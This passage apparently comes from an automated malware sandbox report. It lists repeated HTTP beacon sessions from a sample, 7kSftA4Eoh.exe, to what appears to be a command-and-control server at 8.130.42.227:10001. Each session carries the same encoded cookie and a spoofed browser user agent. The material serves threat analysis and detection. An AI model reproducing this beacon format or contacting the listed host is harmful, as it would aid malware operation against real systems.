                                                                16192.168.2.4497528.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:19.387712955 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:20.348330021 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:20 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.4497538.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:20.464828014 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:21.432746887 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:21 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.4497548.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:21.544409037 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:23.040863037 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:22 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.4497558.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:23.153708935 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:24.109930038 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:23 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.4497568.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:24.230339050 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:25.186378002 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:25 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.4497578.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:25.295239925 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:26.245187044 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:26 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.4497588.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:26.370908976 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:27.329121113 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:27 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.4497598.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:27.449290991 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:28.415271044 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:28 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.4497608.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:28.527602911 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:29.481961012 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:29 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.4497618.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:29.605470896 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:31.127780914 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:30 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.4497628.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:31.246192932 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:32.766760111 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:32 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.4497638.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:32.893191099 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:33.850868940 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:33 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.4497648.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:33.964926004 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:34.933923960 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:34 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.4497658.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:35.042886019 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:36.009809971 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:35 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.4497668.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:36.122195005 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:37.091801882 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:36 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.4497678.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:37.214812040 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:38.179536104 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:38 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.4497688.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:38.308451891 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:39.265749931 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:39 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.4497698.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:39.414067030 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:40.358573914 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:40 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.4497708.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:40.480554104 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:41.456600904 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:41 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.4497718.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:41.574184895 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:42.535255909 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:42 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.4497728.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:42.656169891 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:43.632132053 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:43 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.4497738.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:43.747241974 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:44.697855949 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:44 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.4497748.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:44.808901072 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:45.952497959 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:45 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.4497758.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:46.076970100 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:47.050570011 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:46 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.4497768.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:47.170264959 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:48.123918056 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:47 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.4497778.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:48.249100924 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:49.197149992 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:49 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.4497788.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:49.324487925 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:50.296108961 CEST114INHTTP/1.1 200 OK
